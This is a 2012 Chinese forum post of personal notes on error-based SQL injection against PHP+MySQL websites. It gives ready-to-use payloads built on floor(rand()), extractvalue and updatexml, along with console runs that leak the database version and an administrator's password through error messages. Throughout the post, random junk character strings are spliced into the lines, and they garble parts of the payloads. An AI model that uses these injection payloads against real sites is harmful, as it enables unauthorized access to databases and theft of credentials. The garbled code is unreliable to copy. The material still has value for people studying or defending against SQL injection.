放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
- r1 ]& J r+ a( u# C实际测试环境:
1 ?+ y! j" I" J- v3 ?
' h9 }1 a. A2 h3 d/ ^5 ]7 y8 b 7 `1 o! P @$ P6 c
mysql> show tables;
, c7 T9 U2 W+ o3 y' b$ n+----------------+& F4 m* r! z A6 _0 a ~8 r6 K3 C! z
| Tables_in_test |
% X8 N. X9 r# R& }9 {+----------------+4 C: o6 W4 A/ ~' O0 W
| admin |
2 |/ t6 o9 [% ?| article |
- X9 h" F. t u: o$ g+----------------+( B! a- `' ?+ k) t
5 m+ @4 \+ W8 d
7 V, A+ r% O- K6 j5 z
$ E% H5 J& w4 f. j5 m6 `+ j6 bmysql> describe admin;
' ^ d. X1 x% g k+-------+------------------+------+-----+---------+----------------+- u" _" ~7 d! N2 `. m
| Field | Type | Null | Key | Default | Extra |
: t" r- }) K6 Y; F+-------+------------------+------+-----+---------+----------------++ _( p/ Z4 u* e" A6 N! }8 h3 A% S
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
* P" l0 M; ~! M) d9 ^4 ~7 m| user | varchar(50) | NO | | NULL | |: J x. B2 r, u
| pass | varchar(50) | NO | | NULL | |
3 A# i6 Z+ X+ E3 m+-------+------------------+------+-----+---------+----------------+
5 \- F" }/ W$ |% \) a; ?+ X % V6 h6 f$ ^' q$ @* ^$ \$ E+ O4 ^
$ C- z" ?- j3 J
3 Q8 r$ t- s$ ~8 ~* }9 E5 B6 l7 Pmysql> describe article;% Y, M8 y* t, a. j
+---------+------------------+------+-----+---------+----------------+
/ J& W7 w. k# e( U, o7 d| Field | Type | Null | Key | Default | Extra |; S I8 L/ }% [' U# E
+---------+------------------+------+-----+---------+----------------++ S7 }5 P6 ]# P% o, h3 q
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
. z. ]/ A' `$ @5 s |2 t| title | varchar(50) | NO | | NULL | |
( f8 o& j6 i* t, Z7 f& }7 y| content | varchar(50) | NO | | NULL | |
6 g: l: |3 E7 p6 s3 l' b+---------+------------------+------+-----+---------+----------------+
) n; a3 ? M- A1、通过floor报错
9 H9 {" I3 }- [/ B可以通过如下一些利用代码! ~& x0 ]" x ~/ v& Q
; v5 P/ c, a6 R
& e' p& z. z: |& sand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x' }( s, S: I5 l3 r
from information_schema.tables group by x)a);
6 p+ T& V4 e" D6 C: v 5 ?$ B; P% {( |4 s* C, T" N* J
! X! f8 c9 q/ ^2 ^- p1 t- Fand (select count(*) from (select 1 union select null union select !1)x
4 |( E( F* Z* G9 Q( Dgroup by concat((select table_name from information_schema.tables limit 1),. ~$ t( u! a4 Y
floor(rand(0)*2)));
. M4 B/ P: @- } L. |; @举例如下:
7 e$ P6 L( `! x% R% i首先进行正常查询:8 D1 y& ]; p6 o
, C* ~2 |& o& C0 Smysql> select * from article where id = 1;
5 h; ^. Y: H: A" |+ d+----+-------+---------+5 Z# Q0 d6 h2 ?- V- d
| id | title | content |7 G1 Z0 i' v) [; B% h
+----+-------+---------+* s Q1 z+ w! t7 f. E$ v+ ?# U
| 1 | test | do it |2 q: r$ x4 _+ I' P. P% E5 u
+----+-------+---------+
+ f( O1 t' d2 s4 g/ y- K0 V假如id输入存在注入的话,可以通过如下语句进行报错。3 T) K- m+ c: \+ b8 ~" |8 [# z, C
2 w9 l5 P# h0 ?$ P, y2 i
& _) H) ?6 O+ U' fmysql> select * from article where id = 1 and (select 1 from
! l: Y& L/ R% T" X(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);. t J+ O/ A) _4 n. G# l* I+ q ~
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
. ]7 {8 I; o, p# E. C可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。) S; ~. U, W8 ?
例如我们需要查询管理员用户名和密码:
9 p3 h3 m6 c ^/ R. HMethod1:% C7 S: O6 Z) y/ E, M; Q' K" q3 U) V7 \* O
. ~8 V5 H/ u4 @" {+ s" A
5 M c* z z% C) R$ }. L% Q2 ymysql> select * from article where id = 1 and (select 1 from* l f. ]! q k% @
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
. e0 e1 L/ B/ X! {. @, l7 dfrom information_schema.tables group by x)a);0 ]6 m9 a a; K& k
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
% }5 s5 R+ Y; G6 G, ?6 `Method2:0 w9 w) ^0 `3 Z( ?
; [1 V. `/ K% f! Y, y& H4 ~
3 L6 b- n1 ^" Emysql> select * from article where id = 1 and (select count(*)5 g. _4 [; y e8 p/ _
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
$ P) A- c5 _; p$ w8 h% kfloor(rand(0)*2)));, L& w. L8 {1 L
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'1 g& n$ p% K6 Q( j/ C
2、ExtractValue4 r) W4 {. S4 y) B
测试语句如下
& q1 W! t+ B: g/ P f" j) c- O! \
" v3 O5 m x+ E; [* `5 i; Z( f/ P8 ]
! D" T# e) @' S& a* b( C; Pand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
2 {$ {4 [8 }: X o! a实际测试过程& S! {2 v6 p1 F8 M! F& r
( {- Z( s& t, q4 `# G# d
! b$ R; J$ s8 X/ s0 D5 Ymysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
# b( `1 H! o# X: i. w6 H$ e(select pass from admin limit 1)));--9 z* T+ K4 o( d3 T% S) ?8 E1 W
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
5 j' B; J+ w: A7 P6 z$ Q3、UpdateXml
}& ~7 f' n' k测试语句
' H- z. n- [" y$ J$ J4 t
; Q* ~4 _6 C% \; y2 k- z 8 u, ^ u3 p# e. b. v( d
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))) b- N6 V0 C6 D7 u2 T
实际测试过程
$ b9 m2 h3 h/ j/ v0 }/ Q / F% X$ T2 |6 H4 D3 U2 R G
) s9 L3 U, \$ X- @
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,' C c s9 M9 o& ^
(select pass from admin limit 1),0x5e24),1));1 Z# c* V' ~8 F' ^3 x+ p( O
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
) B9 Q1 K5 T# J* ~0 Y7 F* JAll, thanks foreign guys.3 v* R3 t( r- e" i
# B) }; U4 |2 `. e$ L8 q I) S. \3 J) N/ M
|
发表于 2012-12-10 10:28:51
收藏
支持
反对